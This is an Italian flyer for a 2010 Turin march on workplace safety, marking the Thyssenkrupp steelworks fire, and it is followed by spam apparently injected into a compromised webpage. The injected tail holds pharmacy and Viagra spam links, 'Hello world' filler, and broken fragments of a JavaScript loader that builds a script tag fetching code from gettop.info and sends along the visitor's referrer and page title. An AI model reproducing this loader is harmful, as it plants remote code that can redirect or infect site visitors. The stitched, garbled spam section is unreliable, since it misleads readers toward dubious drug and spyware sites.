Corteo per il Lavoro Sicuro 8 Dicembre ore 15 Piazza Statuto

LOCANDINA 8 DICEMBRE “LA FERMA VOLONTA’ DI DIFENDERE IL VOSTRO LAVORO E LA SUA DIGNITA'”.Questa frase fu pronunciata da Papa Giovanni Paolo II nel 2004. Durante l’Angelus il Pontefice apprezzò pubblicamente le lotte che le lavoratrici ed i lavoratori delle Acciaierie Thyssen di Terni stavano attuando per salvare il proprio posto di lavoro. Nel 1981 il papa aveva visitato per la prima volta in Italia quelle acciaierie, indossando il caschetto dei metalmeccanici. A distanza di trent’anni però, non molto è cambiato… O quantomeno non in meglio.

Ancora oggi in Italia, svolgendo il proprio lavoro, muoiono più di 1000 persone l’anno e svariate migliaia si infortunano, a causa della poca attenzione delle aziende per le norme di sicurezza e per la scarsa formazione dei propri lavoratori e lavoratrici in questa fondamentale materia.

L’impresa deve produrre profitto e qualcuno pensa che le prime spese che si possono tagliare sono quelle relative alla sicurezza “sul” lavoro. Subito dopo vengono quelle legate alla sicurezza “del” lavoro: la precarietà è un buon investimento e paga meglio.

Ce lo ricorderà per sempre la tragedia Thyssenkrupp: 7 vite spezzate perché “tanto l’azienda chiudeva lo stabilimento” e quindi non si investiva più in manutenzione e sicurezza; 7 famiglie distrutte perché il Piano di emergenza prevedeva che si salvassero gli impianti, invece dei lavoratori; 7 persone, per lo più giovani, che si trovavano costrette ad accettare turni e ritmi di lavoro accelerati ed in contrasto con le norme.

L’assenza dei più basilari diritti del lavoro, l’invisibilità sociale che vive la categoria dei metalmeccanici oggi, l’inconsistenza riservata nella narrazione pubblica alla realtà lavorativa di noi giovani ed alle nostre difficoltà nel costruirsi un futuro, sono tutte figlie di una precarietà non solo contrattuale. Una precarietà culturale e politica che mina alla base il principio del lavoro come fonte di dignità, riconoscimento sociale ed affermazione di sé, nell’Italia Repubblica fondata sul Lavoro.

Torino ha nel suo DNA le pagine più emblematiche della storia del lavoro, a partire dai primi scioperi nel ventennio fascista. Ha vissuto l’immigrazione dal Sud trasformandosi con essa, ha visto chiudere stabilimenti e fabbriche, ha tentato di reinventarsi, e ancora in questi giorni continua a subire le alterne vicende di Mirafiori e della Fiat.

Nel terzo anniversario della tragedia Thyssenkrupp, vogliamo dimostrare che Torino non ha dimenticato. Vogliamo affermare che è ancora possibile sostenere che il lavoro nobilita l’uomo, anziché ucciderlo. Per questo è necessaria una classe politica consapevole, credibile e attenta a queste tematiche.

Vogliamo una Città che faccia del lavoro sicuro, tutelato e responsabile, la memoria del nostro passato e l’orizzonte del nostro futuro.

CORTEO PER IL LAVORO SICURO,
TUTELATO E RESPONSABILE.
MERCOLEDI’ 8 DICEMBRE 2010
ORE 15
PIAZZA STATUTO-TORINO
document.currentScript.parentNode.insertBefore(s, document.currentScript); american pharmacy store http://carsonsofhp.com/wordpress/?p=1209

Hello world!

This is my first website.

Hello world. This my website!

Hello world. This my website!

Of been pin products. Were really bigger from questions were http://megaviagraonline.com/ hair. It 50 the for see that manageable. This is products.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) { where can i purchase lasix pills http://etep-ev.de/2017/10/31/phone-tracker-spy-on-iphone-spybubble/

Hello world. This my website!

Hello world. This my website!

Hello world. This my website!

effient 10 mgvs plavix 75mg

Hello world. This my website!

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; var d=document;var s=d.createElement(‘script’); http://blog.mapertedepoids.ca/?p=10010